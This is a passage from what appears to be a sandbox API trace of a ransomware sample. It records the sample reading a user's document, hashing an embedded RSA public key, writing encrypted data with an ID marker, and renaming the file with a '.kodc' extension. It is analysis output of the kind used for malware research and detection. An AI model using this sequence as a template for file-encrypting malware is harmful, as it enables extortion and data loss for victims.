1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.394] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x120a1, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x120a1, lpOverlapped=0x0) returned 1 [0098.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.395] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x120a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.395] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0098.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0098.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.395] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.395] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.395] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.395] CloseHandle (hObject=0x5cc) returned 1 [0098.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.411] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JamfXqUN_6vJZo.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jamfxqun_6vjzo.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JamfXqUN_6vJZo.pps.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jamfxqun_6vjzo.pps.kodc")) returned 1 [0098.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.412] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.413] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67d77e0, ftCreationTime.dwHighDateTime=0x1d5ba00, ftLastAccessTime.dwLowDateTime=0x2bab6360, ftLastAccessTime.dwHighDateTime=0x1d5b9b1, ftLastWriteTime.dwLowDateTime=0x2bab6360, ftLastWriteTime.dwHighDateTime=0x1d5b9b1, nFileSizeHigh=0x0, nFileSizeLow=0x95bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JBBGBkI.csv", cAlternateFileName="")) returned 1 [0098.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.413] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JBBGBkI.csv") returned=".csv" [0098.413] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JBBGBkI.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jbbgbki.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.413] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=38332) returned 1 [0098.413] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.416] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9596, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.416] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.417] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.417] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.417] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x95bc, lpOverlapped=0x0) returned 1 [0098.417] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.418] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.418] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.418] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.419] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.419] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.419] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.419] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.419] GetLastError () returned 0x0 [0098.419] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.419] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.419] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.419] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.419] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x95c0) returned 0x9ba4d90 [0098.419] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d0f0 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9b8 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d138 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9d0 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa00 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa18 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.420] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa00 | out: hHeap=0x630000) returned 1 [0098.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa18 | out: hHeap=0x630000) returned 1 [0098.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aa18 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aa00 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa18 | out: hHeap=0x630000) returned 1 [0098.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa00 | out: hHeap=0x630000) returned 1 [0098.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.421] GetCurrentThreadId () returned 0x42c [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8ed28 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.421] GetCurrentThreadId () returned 0x42c [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa00 [0098.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa18 [0098.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9e8 [0098.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aa30 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa00 | out: hHeap=0x630000) returned 1 [0098.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa00 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa00 | out: hHeap=0x630000) returned 1 [0098.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa30 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa18 